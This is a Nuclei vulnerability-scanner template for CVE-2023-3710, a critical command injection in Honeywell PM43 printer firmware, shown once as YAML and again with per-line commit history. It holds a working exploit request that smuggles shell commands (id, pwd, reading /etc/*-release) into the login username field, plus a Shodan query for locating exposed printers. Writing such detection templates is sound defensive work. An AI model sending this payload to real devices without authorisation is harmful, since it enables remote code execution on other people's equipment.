nuclei-templates/http/cves/2023/CVE-2023-3710.yaml

id: CVE-2023-3710

info:
  name: Honeywell PM43 Printers - Command Injection
  author: win3zz
  severity: critical
  description: |
    Improper Input Validation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Command Injection.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006)
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3710
    - https://github.com/vpxuser/CVE-2023-3710-POC
    - https://twitter.com/win3zz/status/1713451282344853634
    - https://hsmftp.honeywell.com:443/en/Software/Printers/Industrial/PM23-PM23c-PM43-PM43c/Current/Firmware/firmwaresignedP1019050004
    - https://hsmftp.honeywell.com:443/en/Software/Printers/Industrial/PM23-PM23c-PM43-PM43c/Current/Firmware/firmwarexasignedP1019050004A
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-3710
    cwe-id: CWE-77,CWE-20
    epss-score: 0.14017
    epss-percentile: 0.95046
    cpe: cpe:2.3:o:honeywell:pm43_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: honeywell
    product: pm43_firmware
    shodan-query: http.html:"/main/login.lua?pageid="
  tags: cve,cve2023,honeywell,pm43,printer,iot,rce

http:
  - raw:
      - |
        POST /loadfile.lp?pageid=Configure HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=x%0aid;pwd;cat+/etc/*-release%0a&userpassword=1

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)'

      - type: word
        part: body
        words:
          - 'Release date'

      - type: status
        status:
          - 200

# digest: 490a0046304402202d17cc7022b5268516e0a152b04e1c1ec4bd0dcdda7912dae2c6f9332ee637e702203d48d7ca6dc47b3a844268bed3da1c390e367fb23e90672a12d38f52f4abd06d:922c64590222798bb761d5b6d8e72950
Create CVE-2023-3710.yaml Added CVE-2023-3710 Template 2023-10-15 13:57:25 +00:00			`id: CVE-2023-3710`

			`info:`
			`name: Honeywell PM43 Printers - Command Injection`
			`author: win3zz`
minor update 2023-10-16 05:10:56 +00:00			`severity: critical`
Create CVE-2023-3710.yaml Added CVE-2023-3710 Template 2023-10-15 13:57:25 +00:00			`description: \|`
minor update 2023-10-16 05:10:56 +00:00			`Improper Input Validation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Command Injection.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006)`
Create CVE-2023-3710.yaml Added CVE-2023-3710 Template 2023-10-15 13:57:25 +00:00			`reference:`
minor update 2023-10-16 05:10:56 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2023-3710`
Create CVE-2023-3710.yaml Added CVE-2023-3710 Template 2023-10-15 13:57:25 +00:00			`- https://github.com/vpxuser/CVE-2023-3710-POC`
minor update 2023-10-16 05:10:56 +00:00			`- https://twitter.com/win3zz/status/1713451282344853634`
TemplateMan Update [Mon Oct 16 10:59:02 UTC 2023] :robot: 2023-10-16 10:59:03 +00:00			`- https://hsmftp.honeywell.com:443/en/Software/Printers/Industrial/PM23-PM23c-PM43-PM43c/Current/Firmware/firmwaresignedP1019050004`
			`- https://hsmftp.honeywell.com:443/en/Software/Printers/Industrial/PM23-PM23c-PM43-PM43c/Current/Firmware/firmwarexasignedP1019050004A`
minor update 2023-10-16 05:10:56 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cve-id: CVE-2023-3710`
TemplateMan Update [Tue Oct 17 11:50:30 UTC 2023] :robot: 2023-10-17 11:50:30 +00:00			`cwe-id: CWE-77,CWE-20`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00			`epss-score: 0.14017`
TemplateMan Update [Thu Oct 19 10:38:58 UTC 2023] :robot: 2023-10-19 10:38:59 +00:00			`epss-percentile: 0.95046`
minor update 2023-10-16 05:10:56 +00:00			`cpe: cpe:2.3:o:honeywell:pm43_firmware::::::::`
Create CVE-2023-3710.yaml Added CVE-2023-3710 Template 2023-10-15 13:57:25 +00:00			`metadata:`
Update CVE-2023-3710.yaml 2023-10-16 10:50:20 +00:00			`verified: true`
TemplateMan Update [Mon Oct 16 10:59:02 UTC 2023] :robot: 2023-10-16 10:59:03 +00:00			`max-request: 1`
			`vendor: honeywell`
			`product: pm43_firmware`
Update CVE-2023-3710.yaml 2023-10-16 10:50:20 +00:00			`shodan-query: http.html:"/main/login.lua?pageid="`
minor update 2023-10-16 05:10:56 +00:00			`tags: cve,cve2023,honeywell,pm43,printer,iot,rce`
Create CVE-2023-3710.yaml Added CVE-2023-3710 Template 2023-10-15 13:57:25 +00:00
			`http:`
Update CVE-2023-3710.yaml 2023-10-16 10:50:20 +00:00			`- raw:`
			`- \|`
			`POST /loadfile.lp?pageid=Configure HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`username=x%0aid;pwd;cat+/etc/*-release%0a&userpassword=1`
minor update 2023-10-16 05:10:56 +00:00
Create CVE-2023-3710.yaml Added CVE-2023-3710 Template 2023-10-15 13:57:25 +00:00			`matchers-condition: and`
			`matchers:`
minor update 2023-10-16 05:10:56 +00:00			`- type: regex`
			`part: body`
			`regex:`
			`- 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)'`

Create CVE-2023-3710.yaml Added CVE-2023-3710 Template 2023-10-15 13:57:25 +00:00			`- type: word`
minor update 2023-10-16 05:10:56 +00:00			`part: body`
Create CVE-2023-3710.yaml Added CVE-2023-3710 Template 2023-10-15 13:57:25 +00:00			`words:`
minor update 2023-10-16 05:10:56 +00:00			`- 'Release date'`

			`- type: status`
			`status:`
			`- 200`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 490a0046304402202d17cc7022b5268516e0a152b04e1c1ec4bd0dcdda7912dae2c6f9332ee637e702203d48d7ca6dc47b3a844268bed3da1c390e367fb23e90672a12d38f52f4abd06d:922c64590222798bb761d5b6d8e72950`